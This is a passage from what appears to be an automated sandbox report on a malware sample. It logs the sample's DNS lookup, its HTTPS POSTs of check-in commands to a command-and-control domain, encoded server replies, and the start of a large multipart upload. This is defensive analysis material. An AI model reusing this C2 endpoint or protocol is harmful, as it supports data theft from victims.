                                                                                                            Dec 26, 2024 12:45:28.702230930 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.743344069 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:10.836560011 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.125014067 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.125066996 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:11.125375986 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.126271009 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.126286030 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.433682919 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.433760881 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.435704947 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.435730934 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.436161995 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.438121080 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.438374043 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.438425064 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.438529968 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.438545942 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:22.368225098 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:22.368324995 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:22.368592024 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:22.369415045 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:22.369437933 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:23.067842960 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:23.067904949 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:23.067975998 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:23.068305016 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:23.068326950 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.388107061 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.388226986 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.389730930 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.389744043 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.390245914 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.426728010 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.426866055 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.428611040 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.431044102 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.431044102 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.294482946 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.294538021 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:25.294605970 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.295027971 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.295043945 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.599760056 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.599900961 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.601742983 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.601754904 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.602071047 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.603328943 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.603367090 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.603518963 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.603549957 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.603950977 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.837568998 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.837621927 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.837699890 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.839277029 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.839302063 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.144210100 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.145167112 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.148772955 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.148782969 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.149215937 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.180771112 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.180861950 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.181072950 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.183362961 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.183362961 CET50008443192.168.2.6172.67.165.185

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 26, 2024 12:45:10.875790119 CET5401353192.168.2.61.1.1.1
                                                                                                            Dec 26, 2024 12:45:11.017569065 CET53540131.1.1.1192.168.2.6

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 26, 2024 12:45:10.875790119 CET192.168.2.61.1.1.10x9f21Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 26, 2024 12:45:06.839492083 CET1.1.1.1192.168.2.60x9cffNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 26, 2024 12:45:06.839492083 CET1.1.1.1192.168.2.60x9cffNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                            Dec 26, 2024 12:45:11.017569065 CET1.1.1.1192.168.2.60x9f21No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                            Dec 26, 2024 12:45:11.017569065 CET1.1.1.1192.168.2.60x9f21No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • mindhandru.buzz

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.649714172.67.165.1854435448C:\Users\user\Desktop\XM6cn2uNux.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:45:12 UTC262OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 8
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:45:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                            Data Ascii: act=life
                                                                                                            2024-12-26 11:45:15 UTC1126INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:45:14 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=ngcn03lp14gpq520pa5vqileq0; expires=Mon, 21 Apr 2025 05:31:53 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f1esZkZz4t66nNJQwVqx0y%2F8dJty5RA2NDTYVHUbH%2By6xFDwdOypxkg50W%2BzNxTSgxhnQbL5A1aMCUkC8L2YblIycgsE9RV36zHTIHHRqah6SDVtwbFNquo9%2FB1fQRSGEQY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80d2c5dea98c39-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1855&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1563169&cwnd=190&unsent_bytes=0&cid=b313285c9ebbd47d&ts=2817&x=0"
                                                                                                            2024-12-26 11:45:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                            Data Ascii: 2ok
                                                                                                            2024-12-26 11:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.649720172.67.165.1854435448C:\Users\user\Desktop\XM6cn2uNux.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:45:16 UTC263OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 47
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:45:16 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                            2024-12-26 11:45:17 UTC1121INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:45:17 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=icnk7sd2nmmtog61pvsv4n640p; expires=Mon, 21 Apr 2025 05:31:55 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ag8fiooVc9vRXhn90ZU%2FZAVFKuxPkCsysIwpBfdY55vgxo0O5knUh2XESE1Zlf7Qzg0V3z4AR%2FAunEJFGowkwPa4p1dEd9dnDVXFtV7s1eVtiRxxwizBRZkODKTvIN1JYik%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80d2dfaf9a4314-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1588&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1763285&cwnd=188&unsent_bytes=0&cid=fee83dedabadb296&ts=805&x=0"
                                                                                                            2024-12-26 11:45:17 UTC248INData Raw: 63 34 61 0d 0a 4d 6f 77 55 45 46 67 61 76 68 44 4b 39 44 48 77 37 5a 46 71 45 70 4e 70 52 2b 69 37 4d 33 6d 66 62 36 75 66 6b 77 79 36 75 57 78 4a 72 6d 49 79 59 69 36 53 4d 72 6d 52 45 38 71 5a 34 78 39 33 76 30 73 6d 6a 4a 6b 4a 48 2f 34 44 32 50 71 2f 4c 73 7a 55 54 67 6a 71 64 58 77 72 66 35 49 79 72 34 77 54 79 72 62 71 53 48 66 39 53 33 33 4b 33 6c 6b 62 2f 67 50 4a 2f 76 68 6a 79 74 55 50 57 75 42 7a 65 44 31 35 32 6e 47 6d 6d 56 53 56 69 50 41 41 66 50 6f 45 4c 34 57 5a 48 31 76 36 46 59 6d 6c 73 55 48 66 7a 51 31 2f 37 57 64 37 65 6d 65 53 61 2b 69 52 58 39 4c 58 73 77 74 33 38 51 55 68 6a 4e 42 62 45 66 63 4c 79 50 76 35 66 4e 50 66 42 46 72 75 63 48 6b 33 63 4d 35 38 72 4a 35 66 6b 34 4c 77 53 44 36 78 44 44 33 4b 67 52 46
                                                                                                            Data Ascii: c4aMowUEFgavhDK9DHw7ZFqEpNpR+i7M3mfb6ufkwy6uWxJrmIyYi6SMrmRE8qZ4x93v0smjJkJH/4D2Pq/LszUTgjqdXwrf5Iyr4wTyrbqSHf9S33K3lkb/gPJ/vhjytUPWuBzeD152nGmmVSViPAAfPoEL4WZH1v6FYmlsUHfzQ1/7Wd7emeSa+iRX9LXswt38QUhjNBbEfcLyPv5fNPfBFrucHk3cM58rJ5fk4LwSD6xDD3KgRF
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 49 7a 77 37 59 37 4f 52 6a 79 4e 31 4f 54 36 42 76 4d 6a 31 30 6e 43 72 6f 6e 6c 2b 63 69 76 41 48 64 2f 41 4c 4e 34 58 5a 55 68 50 31 43 63 50 79 2f 6d 48 57 30 51 6c 59 35 33 46 39 50 58 44 61 66 61 76 57 48 64 4b 49 36 30 67 6f 73 53 73 31 69 64 70 46 46 75 78 4e 31 72 50 6f 4c 74 2f 58 54 67 69 75 63 48 77 37 64 64 78 67 6f 4a 31 59 6c 35 33 34 41 58 33 38 43 79 69 41 31 6c 49 62 2b 67 66 44 38 76 74 71 31 64 59 49 55 4f 34 32 50 48 70 2f 78 44 4c 77 31 6e 43 58 6e 2f 51 45 5a 72 4d 78 5a 5a 57 58 53 46 76 36 41 59 6d 6c 73 57 62 64 32 41 31 62 34 58 56 36 4d 57 72 63 59 4b 36 62 56 6f 43 4a 39 67 5a 36 38 68 6b 76 68 4e 39 53 45 76 59 45 7a 50 72 31 4c 70 61 62 43 55 69 75 4c 6a 49 62 64 64 64 2b 6f 6f 46 54 30 70 43 39 45 54 44 32 42 32 58 53 6d 56
                                                                                                            Data Ascii: Izw7Y7ORjyN1OT6BvMj10nCronl+civAHd/ALN4XZUhP1CcPy/mHW0QlY53F9PXDafavWHdKI60gosSs1idpFFuxN1rPoLt/XTgiucHw7ddxgoJ1Yl534AX38CyiA1lIb+gfD8vtq1dYIUO42PHp/xDLw1nCXn/QEZrMxZZWXSFv6AYmlsWbd2A1b4XV6MWrcYK6bVoCJ9gZ68hkvhN9SEvYEzPr1LpabCUiuLjIbddd+ooFT0pC9ETD2B2XSmV
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 68 37 33 32 64 70 69 44 54 6e 72 74 59 6e 45 77 4f 75 6c 78 70 70 68 55 68 4d 2f 73 52 6d 6d 78 44 43 6e 4b 67 52 45 57 2f 41 58 50 37 2f 35 6a 32 39 55 41 58 2b 74 35 65 6a 70 34 30 58 65 73 6e 56 69 52 67 76 63 61 65 76 45 44 49 49 76 54 57 31 75 7a 54 63 37 6c 73 54 61 59 36 68 6c 62 72 45 4e 78 4e 48 62 62 5a 4f 69 4a 48 59 76 50 39 41 51 77 71 55 73 6f 67 74 78 55 46 50 77 48 78 2f 6a 37 59 74 44 56 44 55 4c 68 63 6e 49 32 63 4e 5a 2f 70 70 4a 62 6d 34 54 34 44 6e 44 77 41 57 58 45 6d 56 59 44 76 56 57 4a 79 66 5a 69 31 64 52 4d 5a 65 31 34 66 44 31 75 6e 47 33 6d 6a 78 4f 56 67 37 4e 51 4d 50 30 43 4a 59 48 54 56 52 76 36 41 4d 7a 2b 39 6d 33 56 33 41 52 65 36 58 4a 2b 4d 33 58 61 63 71 2b 53 56 6f 43 4b 2b 67 52 38 73 55 56 6c 6a 63 45 52 51 37 30
                                                                                                            Data Ascii: h732dpiDTnrtYnEwOulxpphUhM/sRmmxDCnKgREW/AXP7/5j29UAX+t5ejp40XesnViRgvcaevEDIIvTW1uzTc7lsTaY6hlbrENxNHbbZOiJHYvP9AQwqUsogtxUFPwHx/j7YtDVDULhcnI2cNZ/ppJbm4T4DnDwAWXEmVYDvVWJyfZi1dRMZe14fD1unG3mjxOVg7NQMP0CJYHTVRv6AMz+9m3V3ARe6XJ+M3Xacq+SVoCK+gR8sUVljcERQ70
                                                                                                            2024-12-26 11:45:17 UTC167INData Raw: 54 61 59 30 67 64 43 34 48 68 37 4e 33 37 55 64 61 61 62 57 4a 53 45 39 41 39 32 2f 41 4d 6f 6a 39 70 51 48 2f 63 66 79 76 62 37 59 39 4b 62 51 42 44 70 62 6a 4a 69 4f 50 74 2b 67 59 5a 49 67 4a 6d 7a 46 7a 37 6f 53 79 4b 47 6d 51 6c 62 2f 67 4c 41 38 76 6c 6d 31 39 51 4b 58 75 68 77 66 7a 39 33 31 6d 43 67 6d 46 36 5a 67 50 67 61 63 50 77 50 4b 59 37 52 57 68 47 39 51 34 6e 36 36 53 36 41 6d 7a 74 64 34 58 5a 78 4c 44 6a 44 50 4c 48 57 56 4a 37 50 71 30 68 38 2f 77 73 71 68 74 56 61 45 2f 0d 0a
                                                                                                            Data Ascii: TaY0gdC4Hh7N37UdaabWJSE9A92/AMoj9pQH/cfyvb7Y9KbQBDpbjJiOPt+gYZIgJmzFz7oSyKGmQlb/gLA8vlm19QKXuhwfz931mCgmF6ZgPgacPwPKY7RWhG9Q4n66S6Amztd4XZxLDjDPLHWVJ7Pq0h8/wsqhtVaE/
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 38 33 39 0d 0a 77 42 78 2f 72 30 5a 39 44 54 48 46 48 71 66 6e 4d 30 64 39 31 32 72 5a 4e 58 6c 59 76 31 42 7a 43 2f 53 79 4b 53 6d 51 6c 62 30 69 72 38 76 39 42 55 6d 4d 52 41 53 61 35 78 66 6e 6f 67 6e 48 36 72 6d 6c 75 64 69 66 6f 45 65 76 67 41 4b 59 48 64 58 52 4c 34 43 38 6a 34 39 47 2f 63 31 77 52 57 37 58 56 39 4e 58 66 55 4d 75 62 57 56 49 72 50 71 30 68 56 35 67 41 72 6a 4a 6c 4f 56 65 52 4e 7a 76 47 78 4e 70 6a 58 42 31 62 6f 63 33 34 37 66 74 52 33 6f 4a 4a 53 6c 49 6e 77 42 33 54 30 43 69 71 4f 31 56 38 52 2f 41 7a 46 39 76 35 6c 33 5a 74 41 45 4f 6c 75 4d 6d 49 34 37 58 47 2b 67 55 4f 65 7a 2b 78 47 61 62 45 4d 4b 63 71 42 45 52 72 76 42 38 50 7a 39 47 48 64 32 41 46 58 34 33 42 2b 4d 48 48 55 64 4b 65 66 51 5a 47 44 2f 51 39 2b 2f 51 55 6f
                                                                                                            Data Ascii: 839wBx/r0Z9DTHFHqfnM0d912rZNXlYv1BzC/SyKSmQlb0ir8v9BUmMRASa5xfnognH6rmludifoEevgAKYHdXRL4C8j49G/c1wRW7XV9NXfUMubWVIrPq0hV5gArjJlOVeRNzvGxNpjXB1boc347ftR3oJJSlInwB3T0CiqO1V8R/AzF9v5l3ZtAEOluMmI47XG+gUOez+xGabEMKcqBERrvB8Pz9GHd2AFX43B+MHHUdKefQZGD/Q9+/QUo
                                                                                                            2024-12-26 11:45:17 UTC743INData Raw: 7a 30 42 74 76 33 39 6d 6e 54 30 77 56 66 36 47 52 2b 4e 47 72 5a 59 4c 72 57 48 64 4b 49 36 30 67 6f 73 54 30 69 6d 73 6c 53 57 63 77 62 79 75 76 36 59 39 53 62 45 52 37 33 4e 6e 55 32 4f 49 51 79 72 70 6c 61 6b 59 44 79 41 58 7a 38 44 69 79 50 32 46 63 66 39 77 66 4a 2b 2f 64 76 33 64 45 4e 55 65 52 2f 64 54 4a 2f 33 32 44 6f 32 42 4f 56 6c 37 4e 51 4d 4e 67 4d 4e 34 54 4a 45 51 53 7a 46 49 6e 36 2f 53 36 41 6d 77 70 61 34 58 4a 31 4e 6e 37 5a 64 4b 57 58 58 4a 4f 50 2f 41 78 37 2b 41 30 6b 68 39 78 63 48 2b 38 48 77 76 4c 39 5a 39 54 57 54 68 36 75 63 57 70 36 49 4a 78 44 70 5a 68 64 6c 5a 6d 7a 46 7a 37 6f 53 79 4b 47 6d 51 6c 62 2f 41 48 47 2f 76 35 74 32 39 6f 45 51 76 78 36 65 7a 4a 39 30 48 6d 6d 6b 45 47 55 67 50 6f 4c 63 2f 67 4d 4c 59 62 54 55
                                                                                                            Data Ascii: z0Btv39mnT0wVf6GR+NGrZYLrWHdKI60gosT0imslSWcwbyuv6Y9SbER73NnU2OIQyrplakYDyAXz8DiyP2Fcf9wfJ+/dv3dENUeR/dTJ/32Do2BOVl7NQMNgMN4TJEQSzFIn6/S6Amwpa4XJ1Nn7ZdKWXXJOP/Ax7+A0kh9xcH+8HwvL9Z9TWTh6ucWp6IJxDpZhdlZmzFz7oSyKGmQlb/AHG/v5t29oEQvx6ezJ90HmmkEGUgPoLc/gMLYbTU
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 38 33 32 0d 0a 77 65 44 35 37 31 58 47 76 6e 31 57 5a 6a 50 6b 48 64 2f 63 50 4a 59 48 65 58 78 33 34 42 73 43 39 76 79 37 66 77 30 34 49 72 6c 42 52 4b 47 72 75 66 4b 75 4e 45 34 33 42 36 6b 68 33 2f 55 74 39 79 74 4a 5a 46 4f 38 49 77 50 58 31 5a 39 6a 66 42 46 33 70 64 6e 63 33 66 64 68 38 72 4a 46 54 6e 6f 44 30 41 48 2f 31 43 79 72 4b 6c 78 45 63 35 55 32 52 76 64 46 6c 7a 76 6f 41 57 2f 77 32 62 58 52 68 6e 48 57 6b 31 67 76 53 67 66 6f 4a 65 50 38 48 4c 59 37 4c 55 52 44 30 41 73 6a 79 38 57 33 5a 30 51 5a 43 36 48 5a 35 4d 6e 2f 55 64 71 61 45 55 70 33 50 76 55 68 33 36 55 74 39 79 75 68 48 48 50 6f 43 69 39 54 32 64 64 6e 52 44 56 76 69 4e 6d 31 30 59 5a 78 31 70 4e 59 4c 30 6f 4c 2f 42 58 54 6a 42 79 57 4b 30 46 59 52 37 77 4c 47 38 50 4a 75 33
                                                                                                            Data Ascii: 832weD571XGvn1WZjPkHd/cPJYHeXx34BsC9vy7fw04IrlBRKGrufKuNE43B6kh3/Ut9ytJZFO8IwPX1Z9jfBF3pdnc3fdh8rJFTnoD0AH/1CyrKlxEc5U2RvdFlzvoAW/w2bXRhnHWk1gvSgfoJeP8HLY7LURD0Asjy8W3Z0QZC6HZ5Mn/UdqaEUp3PvUh36Ut9yuhHHPoCi9T2ddnRDVviNm10YZx1pNYL0oL/BXTjByWK0FYR7wLG8PJu3
                                                                                                            2024-12-26 11:45:17 UTC736INData Raw: 76 66 48 34 37 66 39 74 35 75 70 31 42 6d 59 66 77 42 6e 6a 34 43 79 75 4b 32 46 77 62 76 55 4f 4a 2b 75 6b 75 67 4a 73 72 63 2f 6c 67 65 48 68 62 79 32 53 69 6b 56 2b 45 68 50 49 4c 5a 76 77 62 5a 63 53 5a 51 42 7a 73 54 5a 48 72 34 58 6e 66 78 45 42 4a 72 6e 46 2b 65 69 43 63 65 61 65 59 58 70 6d 4c 2b 67 31 34 38 67 34 67 67 4e 56 64 47 76 55 45 77 2f 6a 30 61 4e 4c 59 41 46 2f 76 65 6e 59 7a 64 74 55 79 35 74 5a 55 69 73 2b 72 53 45 62 68 44 44 32 48 79 52 4d 70 2f 68 7a 59 36 50 78 2b 33 70 6b 68 55 2b 4a 31 64 7a 31 6f 6e 47 33 6d 6a 78 4f 56 67 37 4e 51 4d 50 45 50 4b 59 6e 65 58 78 54 77 41 73 37 32 2f 6d 54 57 79 51 46 56 35 6e 70 36 4e 32 72 57 65 4c 71 66 57 70 2b 42 2b 78 70 7a 73 55 56 6c 6a 63 45 52 51 37 30 2f 77 2f 37 39 65 4e 58 55 54 6b
                                                                                                            Data Ascii: vfH47f9t5up1BmYfwBnj4CyuK2FwbvUOJ+ukugJsrc/lgeHhby2SikV+EhPILZvwbZcSZQBzsTZHr4XnfxEBJrnF+eiCceaeYXpmL+g148g4ggNVdGvUEw/j0aNLYAF/venYzdtUy5tZUis+rSEbhDD2HyRMp/hzY6Px+3pkhU+J1dz1onG3mjxOVg7NQMPEPKYneXxTwAs72/mTWyQFV5np6N2rWeLqfWp+B+xpzsUVljcERQ70/w/79eNXUTk
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 38 30 63 0d 0a 76 76 59 45 35 61 65 73 31 41 67 6f 31 42 77 32 59 34 42 53 65 4a 44 30 4c 33 6e 4c 6f 43 4a 51 42 44 38 4e 69 70 36 50 39 39 67 75 70 42 51 68 49 79 30 4e 6b 37 57 45 53 69 4d 7a 6b 41 6c 77 77 72 54 38 50 64 35 79 5a 63 62 55 2b 42 34 64 53 77 34 6b 6a 4b 6e 31 67 75 72 7a 37 74 49 54 37 39 4c 50 63 71 42 45 53 37 2b 41 38 66 36 35 33 2b 56 2f 42 52 64 36 47 46 6a 65 6a 61 63 64 4f 6a 4f 41 39 7a 50 39 78 6b 77 71 56 74 33 30 59 77 43 54 4b 31 66 31 72 50 6f 4c 73 36 62 56 67 4b 67 4e 6d 42 36 49 4a 77 31 71 34 52 42 6c 49 7a 6c 43 7a 66 50 4e 51 75 4e 33 31 51 63 37 55 2f 6e 39 75 56 70 6d 4a 56 4f 58 36 34 75 53 33 6f 77 6e 45 33 6d 31 6b 76 53 31 37 4d 39 63 2f 38 46 49 70 7a 49 48 44 58 36 43 38 7a 36 34 53 7a 32 30 42 70 58 72 6a 67
                                                                                                            Data Ascii: 80cvvYE5aes1Ago1Bw2Y4BSeJD0L3nLoCJQBD8Nip6P99gupBQhIy0Nk7WESiMzkAlwwrT8Pd5yZcbU+B4dSw4kjKn1gurz7tIT79LPcqBES7+A8f653+V/BRd6GFjejacdOjOA9zP9xkwqVt30YwCTK1f1rPoLs6bVgKgNmB6IJw1q4RBlIzlCzfPNQuN31Qc7U/n9uVpmJVOX64uS3ownE3m1kvS17M9c/8FIpzIHDX6C8z64Sz20BpXrjg


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.649736172.67.165.1854435448C:\Users\user\Desktop\XM6cn2uNux.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:45:19 UTC272OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=3C0DBROOY
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 12805
                                                                                                            Host: mindhandru.buzz
